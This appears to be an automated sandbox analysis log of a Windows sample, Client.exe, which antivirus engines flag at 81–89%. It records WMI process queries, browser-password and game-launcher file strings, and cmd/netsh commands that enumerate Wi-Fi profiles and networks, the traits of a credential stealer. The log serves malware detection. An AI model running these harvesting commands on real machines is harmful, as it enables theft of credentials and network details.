Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\Client.exe

File read: C:\Users\user\Pictures\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpE1B8.tmp.dat.0.dr, tmpE164.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Client.exe	ReversingLabs: Detection: 81%
Source: Client.exe	Virustotal: Detection: 89%

Source: Client.exe

String found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json

Source: unknown	Process created: C:\Users\user\Desktop\Client.exe "C:\Users\user\Desktop\Client.exe"
Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
